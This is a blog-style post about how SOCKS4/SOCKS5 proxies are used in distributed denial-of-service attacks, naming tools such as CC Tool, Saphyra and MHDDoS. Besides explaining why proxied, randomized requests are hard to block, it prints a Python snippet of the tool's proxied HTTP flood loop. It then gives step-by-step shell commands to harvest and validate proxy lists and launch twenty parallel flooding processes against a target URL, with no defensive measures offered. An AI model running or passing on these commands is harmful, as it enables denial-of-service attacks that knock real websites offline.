In this post we will review usage of sock4 and sock5 HTTP proxies, and some open source tools that are utilizing them.
These proxies, also referred as anonymous proxies, serve as intermediates which send an HTTP request to a target web server as requested by a client. Some of these proxies are available only for paying customers, but there are also some free proxies. Check out the site for a list of some of these servers.
The proxies can be used to hide a client IP, but they are also used to summon a DDoS attack on a web site. The capability to attack a web site from multiple source IP makes it difficult to protect the web site. Unlike an attack from a single source IP, which can be simply blocked upon detection of the attacking party, each of these proxies has it own IP, and hence blocking of a single IP or even detection of the attack is harder.
No only that, but also some tools, such as CC Tool, Saphyra, and MHDDoS, are globally available open source tools, that not only use multiple sock4/sock5 proxies, but also randomize the HTTP requests including the HTTP headers, the HTTP URL, and the HTTP cookies. Hence it is not only multiple attacking IPs, but also multiple requests formats, which it hard to identify.
Let examine, for example, the CC tool. It starts by downloading list of sock4 or sock5 proxy servers, and then validates the connection to them. Then, it uses only the proxy servers that were successfully validated, and starts multiple threads to send HTTP requests. Each thread randomly selects one of the proxy servers, and sends multiple requests to the server. The requests include random URL suffix, and random headers out of a static list of predefined headers.
The socks4 and socks5 support is included in PySocks library, and a simple usage is as follows:
import socks
s = socks.socksocket()
if proxy_type == 4:
s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if proxy_type == 5:
s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(target), int(port)))
if protocol == "https":
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s, server_hostname=target)
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
Some tools reuse the same socket, and send multiple GET/POST requests on the same socket, without waiting for response. This multiplies the affect of the attack, especially if not protection/validation method is used on the server side.
To run the CC tool, we first run it to create a list of proxies to use, for example:
set -x
python3 -down -mode cc -v ${VERSION} -f socks${VERSION}_download_all.txt
sort socks${VERSION}_download_all.txt | uniq -u > socks${VERSION}_download_unique.txt
wc -l socks${VERSION}_download_unique.txt
cp socks${VERSION}_download_unique.txt socks${VERSION}.txt
python3 -check -mode cc -v ${VERSION} -f socks${VERSION}.txt
wc -l socks${VERSION}.txt
Then, we can run the DDoS using:
set -x
ulimit -n 999999
for i in {1..20}; do python3 -url -m ${METHOD} -v ${VERSION} -f socks${VERSION}.txt -s 600 -t 400& done